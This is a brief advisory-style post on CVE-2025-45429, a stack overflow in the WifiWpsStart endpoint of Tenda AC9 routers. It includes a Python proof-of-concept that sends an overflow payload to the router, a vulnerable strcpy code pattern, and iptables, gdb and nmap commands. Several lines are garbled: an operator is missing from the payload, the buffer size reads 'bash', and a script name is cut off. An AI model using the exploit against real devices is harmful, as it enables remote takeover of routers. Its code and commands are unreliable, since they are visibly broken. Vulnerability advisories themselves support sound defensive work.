How the CVE Works:
The CVE-2025-45429 vulnerability exists in Tenda AC9 routers (v1.0) running firmware V15.03.05.14_multi. The stack overflow occurs in the `/goform/WifiWpsStart` endpoint when processing overly long input strings. Attackers can craft malicious HTTP POST requests with oversized parameters that exceed the buffer capacity, overwriting adjacent memory regions. This allows remote code execution by carefully manipulating the return address or function pointers on the stack. The vulnerability doesn’t require authentication, making it particularly dangerous as it can be exploited from the WAN interface.
DailyCVE Form:
Platform: Tenda AC9 Router
Version: V15.03.05.14_multi
Vulnerability: Stack Overflow
Severity: Critical
Date: 04/23/2025
What Undercode Say:
Exploit PoC (for educational purposes only)
import requests
target = "http://192.168.0.1/goform/WifiWpsStart"
payload = "A" 1024 + "\xde\xad\xbe\xef" Overflow buffer + controlled EIP
response = requests.post(target, data={"wps_enable": payload})
print(response.status_code)
Protection commands:
Temporary mitigation (block access to vulnerable endpoint) iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/WifiWpsStart" --algo bm -j DROP Firmware update check curl -s http://www.tendacn.com/en/security/ | grep AC9
Memory analysis commands:
Crash analysis on router gdb -q /usr/bin/httpd core.dump info registers x/20x $sp
Vulnerable code pattern:
// Vulnerable function example
void handleWpsStart() {
char buffer[bash]; // Fixed-size buffer
strcpy(buffer, get_param("wps_enable")); // Unsafe copy
}
Patch verification:
Check patched version strings /usr/bin/httpd | grep "15.03.05.15" md5sum /usr/bin/httpd
Network detection:
Identify vulnerable devices nmap -p80 --script http- -sV 192.168.0.0/24 | grep "Tenda AC9"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
